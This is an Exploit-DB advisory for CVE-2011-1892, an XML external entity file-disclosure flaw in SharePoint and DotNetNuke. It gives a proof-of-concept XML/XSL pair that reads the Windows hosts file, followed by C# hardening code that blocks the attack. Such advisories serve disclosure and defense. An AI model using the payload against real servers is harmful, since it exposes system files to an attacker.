SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)

  • Author: Nicolas Gregoire
    Date: 2011-09-20
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17873/
  • Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
    Date: September 15, 2011
    Author: Nicolas Gregoire
    Version: SharePoint 2007 / 2010, DotNetNuke < 6
    CVE : CVE-2011-1892
    
    poc filename: xee.xml
    
    <!DOCTYPE doc [
    <!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
    ]>
    <doc>&boom;</doc>
    
    poc filename: xee.xsl
    
    <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:template match="/">
    <xsl:apply-templates/>
    <xsl:value-of select="doc"/>
    </xsl:template>
    </xsl:stylesheet>
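
The defensive counterpart to the PoC pair above, for .NET code that runs an XSLT transform over untrusted XML: with DTDs prohibited and no resolver set, xee.xml is rejected before the entity can be expanded. This C# is an added example, not part of the original advisory and not SharePoint or DotNetNuke code; the names XeeHardeningDemo and SafeTransform are hypothetical and the benign document is constructed.

```csharp
using System;
using System.IO;
using System.Xml;
using System.Xml.Xsl;

static class XeeHardeningDemo   // hypothetical name, not from the advisory
{
    // The page's xee.xml and xee.xsl, embedded as sample input.
    const string PocXml = @"<!DOCTYPE doc [
<!ENTITY boom SYSTEM ""c:\\windows\\system32\\drivers\\etc\\hosts"">
]>
<doc>&boom;</doc>";
    const string PocXsl = @"<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"">
<xsl:template match=""/"">
<xsl:apply-templates/>
<xsl:value-of select=""doc""/>
</xsl:template>
</xsl:stylesheet>";
    const string BenignXml = "<doc>constructed sample text</doc>"; // constructed

    static string SafeTransform(string xml, string xslt)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit, // any <!DOCTYPE> throws XmlException
            XmlResolver = null                      // never fetch external resources
        };
        var transform = new XslCompiledTransform();
        using (var xsl = XmlReader.Create(new StringReader(xslt), settings))
        {
            // XsltSettings.Default leaves document() and script blocks disabled;
            // the null resolver blocks external xsl:import / xsl:include.
            transform.Load(xsl, XsltSettings.Default, null);
        }
        using (var input = XmlReader.Create(new StringReader(xml), settings))
        using (var output = new StringWriter())
        {
            transform.Transform(input, null, output);
            return output.ToString();
        }
    }

    static void Main()
    {
        Console.WriteLine("benign: " + SafeTransform(BenignXml, PocXsl));
        try { SafeTransform(PocXml, PocXsl); Console.WriteLine("PoC was NOT rejected"); }
        catch (Exception e) when (e is XmlException || e is XsltException)
        { Console.WriteLine("PoC rejected: " + e.Message); }
    }
}
```

`DtdProcessing` exists from .NET Framework 4.0 onward; on earlier framework versions the equivalent setting is `XmlReaderSettings.ProhibitDtd = true`.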